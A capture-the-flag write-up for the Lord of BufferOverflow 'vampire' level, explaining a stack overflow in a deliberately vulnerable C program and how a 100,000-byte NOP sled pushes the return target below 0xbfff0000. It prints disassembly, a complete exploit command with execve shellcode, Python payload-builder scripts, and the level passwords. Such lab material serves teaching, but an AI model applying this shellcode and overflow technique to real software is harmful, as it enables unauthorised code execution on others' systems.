[Lord Of BufferOverFlow] #9 troll -> vampire

2021. 2. 26. 04:16 · Write-Up/LOB(lord of bufferoverflow)

login : troll

password : aspirin

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy */

int main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        /* byte 47 of argv[1] (top byte of the return address) must be 0xbf */
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        /* byte 46 (next byte of the return address) must not be 0xff */
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);   /* unbounded copy into a 40-byte buffer */
        printf("%s\n", buffer);
        return 0;
}

argv[1][47] must be 0xbf and argv[1][46] must not be 0xff. Since the saved return address is overwritten by argv[1][44..47] (little-endian), index 47 is the top byte and index 46 the one below it, so a return address of the form 0xbfff____ is rejected.
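To see exactly which return addresses the two checks let through, here is an added example (not from the original write-up; it uses Python 3 bytes rather than the Python 2 print used on the page) that rebuilds the overflow prefix for a candidate return address and applies the same two byte checks vampire.c does. The 44 bytes of filler come from buffer at ebp-0x28 plus the 4-byte saved ebp, as the disassembly below shows; the addresses in the sample list are illustrative.

```python
import struct

# Stack layout the write-up establishes: buffer[40] sits at ebp-0x28, so
# 40 bytes of buffer plus 4 bytes of saved ebp (44 in total) precede the
# saved return address, which therefore occupies argv[1][44..47].
FILLER_LEN = 44


def vampire_filter(argv1: bytes) -> str:
    """Reproduce the two checks vampire.c applies before strcpy.

    Returns the message the binary would print, or "accepted".
    """
    if len(argv1) < 48:
        # The real binary would read past the end of the string here;
        # assumption: treat anything too short to reach index 47 as rejected.
        return "too short to reach argv[1][47]"
    if argv1[47] != 0xBF:
        return "stack is still your friend."
    if argv1[46] == 0xFF:
        return "but it's not forever"
    return "accepted"


def overflow_prefix(ret_addr: int) -> bytes:
    """44 bytes of NOP filler followed by ret_addr packed little-endian."""
    return b"\x90" * FILLER_LEN + struct.pack("<I", ret_addr)


def verdict(ret_addr: int) -> str:
    """What vampire would say about a payload that returns to ret_addr."""
    return vampire_filter(overflow_prefix(ret_addr))


def checked_bytes(ret_addr: int) -> tuple:
    """The (argv1[46], argv1[47]) pair the binary inspects for ret_addr:
    little-endian packing puts the top byte at index 47 and the next at 46."""
    prefix = overflow_prefix(ret_addr)
    return prefix[46], prefix[47]


if __name__ == "__main__":
    # Illustrative candidates: the usual 0xbfff____ stack addresses, the two
    # edges of the forbidden range, the page's final target, and non-stack values.
    for addr in (0xBFFFFA50, 0xBFFF0000, 0xBFFEFFFF, 0xBFFE74C0, 0xBEFFFFFF, 0x08048480):
        b46, b47 = checked_bytes(addr)
        print(f"{addr:#010x}  [46]={b46:#04x} [47]={b47:#04x}  -> {verdict(addr)}")
```

Any address at or above 0xbfff0000 trips the second check, and anything whose top byte is not 0xbf trips the first, so the only stack addresses that survive are those in 0xbf000000..0xbffeffff.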

 

0x8048477 <main+71>:    add    $0x4,%esp
0x804847a <main+74>:    lea    0x0(%esi),%esi
0x8048480 <main+80>:    mov    0xc(%ebp),%eax
0x8048483 <main+83>:    add    $0x4,%eax
0x8048486 <main+86>:    mov    (%eax),%edx
0x8048488 <main+88>:    add    $0x2e,%edx
0x804848b <main+91>:    cmpb   $0xff,(%edx)
0x804848e <main+94>:    jne    0x80484a7 <main+119>
0x8048490 <main+96>:    push   $0x8048549
0x8048495 <main+101>:   call   0x8048350 <printf>
0x804849a <main+106>:   add    $0x4,%esp
0x804849d <main+109>:   push   $0x0
0x804849f <main+111>:   call   0x8048360 <exit>
0x80484a4 <main+116>:   add    $0x4,%esp
0x80484a7 <main+119>:   mov    0xc(%ebp),%eax
0x80484aa <main+122>:   add    $0x4,%eax
0x80484ad <main+125>:   mov    (%eax),%edx
0x80484af <main+127>:   push   %edx
0x80484b0 <main+128>:   lea    0xffffffd8(%ebp),%eax
0x80484b3 <main+131>:   push   %eax
0x80484b4 <main+132>:   call   0x8048370 <strcpy>
0x80484b9 <main+137>:   add    $0x8,%esp
0x80484bc <main+140>:   lea    0xffffffd8(%ebp),%eax
0x80484bf <main+143>:   push   %eax
0x80484c0 <main+144>:   push   $0x804855f
0x80484c5 <main+149>:   call   0x8048350 <printf>
0x80484ca <main+154>:   add    $0x8,%esp
0x80484cd <main+157>:   leave
0x80484ce <main+158>:   ret
0x80484cf <main+159>:   nop

Set a breakpoint on the strcpy call at 0x80484b4 and run it with a dummy return address to locate the buffer:

 r `python -c 'print "\x90"*44 +"\xbf\xbf\xbf\xbf"'`

Every address I would want to use in the payload is 0xbfff____, and none of them can be used....

There is no restriction on argv like in the previous level, so what about using a NOP sled to get out of the 0xbfff range?

 

`python -c 'print "\x90"*44 + "\xbf\xbf\xbf\xbf" + "\x90"*50000'`

I put in 50,000 and it looks like it's nowhere near enough;

(esp after 50,000)
I put in 100,000 instead.

 

 

./vampire `python -c 'print"\x90"*44+"\xc0\x74\xfe\xbf" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x50\xfc\xff\xbf"'`
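The reasoning above (the byte filter from the first paragraph and the question of how large the NOP sled must be) can be worked through numerically. The following is an added example, not the page's own script, written for Python 3: it builds the same payload layout as the final command (44 filler bytes, return address, NOP sled, the page's 25-byte shellcode), estimates where argv[1] lands given an assumed stack top of 0xc0000000 and an assumed overhead for argv[0] and the environment strings, and reports how much of the sled falls below 0xbfff0000. With the stack top at 0xc0000000 the 0xbfff____ region is exactly 65536 bytes, which is why a 50,000-byte sled never leaves it while a 100,000-byte one does. The file name sled.py and the overhead value of 1000 are assumptions.

```python
import struct

# Constructed from the page's final command: 25-byte execve("/bin//sh") shellcode.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")

STACK_TOP = 0xC0000000   # assumption: the 32-bit 3G/1G layout of the LOB VM
BFFF_FLOOR = 0xBFFF0000  # every address >= this has 0xff at [46] and 0xbf at [47]
PREFIX_LEN = 44 + 4      # filler up to and including the return address


def build_payload(ret_addr: int, sled_len: int) -> bytes:
    """44 filler bytes, the return address, a NOP sled, then the shellcode."""
    payload = (b"\x90" * 44 + struct.pack("<I", ret_addr)
               + b"\x90" * sled_len + SHELLCODE)
    if b"\x00" in payload:
        raise ValueError("NUL byte in payload: strcpy would stop copying there")
    return payload


def passes_filter(payload: bytes) -> bool:
    """The two byte checks from vampire.c."""
    return payload[47] == 0xBF and payload[46] != 0xFF


def argv1_start(payload_len: int, overhead: int) -> int:
    """Estimated start address of argv[1].  argv/envp strings are laid out at
    the very top of the stack, so argv[1] begins its own length (plus NUL)
    below STACK_TOP, pushed further down by `overhead` bytes (argv[0],
    environment strings, alignment), an assumed, environment-dependent figure."""
    return STACK_TOP - overhead - (payload_len + 1)


def usable_sled_bytes(sled_len: int, overhead: int) -> int:
    """How many sled bytes lie below 0xbfff0000, i.e. how many return targets
    inside the sled would pass the filter, for a build_payload() payload."""
    total = PREFIX_LEN + sled_len + len(SHELLCODE)
    sled_start = argv1_start(total, overhead) + PREFIX_LEN
    return max(0, min(sled_len, BFFF_FLOOR - sled_start))


def min_sled_to_escape(overhead: int) -> int:
    """Smallest sled that places at least one NOP below 0xbfff0000."""
    return (STACK_TOP - BFFF_FLOOR) - overhead - (len(SHELLCODE) + 1) + 1


def suggested_target(sled_len: int, overhead: int) -> int:
    """Middle of the part of the sled below 0xbfff0000; 0 if none is usable.
    An estimate only: the real figure is confirmed in gdb, as the write-up does."""
    usable = usable_sled_bytes(sled_len, overhead)
    if usable == 0:
        return 0
    total = PREFIX_LEN + sled_len + len(SHELLCODE)
    sled_start = argv1_start(total, overhead) + PREFIX_LEN
    return sled_start + usable // 2


if __name__ == "__main__":
    import sys
    overhead = 1000   # assumed; the real value depends on argv[0] and the environment
    sled = 100000
    if len(sys.argv) > 1 and sys.argv[1] == "--raw":
        # Emit the raw bytes, e.g.  ./vampire "$(python3 sled.py --raw)"
        sys.stdout.buffer.write(build_payload(suggested_target(sled, overhead), sled))
    else:
        for n in (50000, sled):
            print(f"sled {n:>6}: {usable_sled_bytes(n, overhead)} sled bytes below {BFFF_FLOOR:#x}")
        print(f"smallest sled that escapes 0xbfff____: {min_sled_to_escape(overhead)}")
        t = suggested_target(sled, overhead)
        print(f"suggested target {t:#010x}; passes filter: {passes_filter(build_payload(t, sled))}")
```

The suggested target is only an estimate; the write-up's own address 0xbffe74c0 came from inspecting the stack in gdb after the 100,000-byte run, and that is how the figure should be confirmed. The four bytes the page appends after the shellcode are never executed: on success the execve in the shellcode does not return.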

 

Password for vampire: music world
